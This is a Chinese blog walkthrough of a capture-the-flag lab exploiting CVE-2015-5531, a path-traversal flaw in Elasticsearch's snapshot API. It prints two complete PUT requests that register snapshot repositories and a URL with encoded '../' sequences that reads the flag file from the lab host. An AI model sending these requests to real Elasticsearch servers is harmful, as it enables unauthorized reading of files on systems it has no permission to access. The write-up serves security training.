春秋云境CVE-2015-5531

1.阅读靶场介绍

这里能直接得到思路就是

目录遍历然后用...访问

2.启动靶场

这里可能要稍等片刻哟,靶场才可以正常

正常页面如下所示

3.poc

其实各位彦祖也可以直接利用博主的包

去修改host部分的内容即可

这里我们直接启动bp抓包

然后先构造这个包

PUT /_snapshot/test HTTP/1.1
Host: 8.147.132.32:40772
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:149.0) Gecko/20100101 Firefox/149.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: wp-settings-time-1=1762481244
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Length: 114

{
    
"type": "fs",
    
"settings": {
        
"location": "/usr/share/elasticsearch/repo/test" 
    }
}

返回的结果是200就是没问题的

然后构造这个包

PUT /_snapshot/tes2t HTTP/1.1
Host: 8.147.132.32:40772
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:149.0) Gecko/20100101 Firefox/149.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: wp-settings-time-1=1762481244
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Length: 132

{
    
"type": "fs",
    
"settings": {
        
"location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" 
    }
}

结果如上图所示

最后就是访问这个url

http://8.147.132.32:40772/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fflag

会出现这个结果

然后就是复制数字的部分喂给ai

稍等片刻就可以得到我们心心念念的flag了

如下所示

到此文章就结束了

感谢您宝贵的时间

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值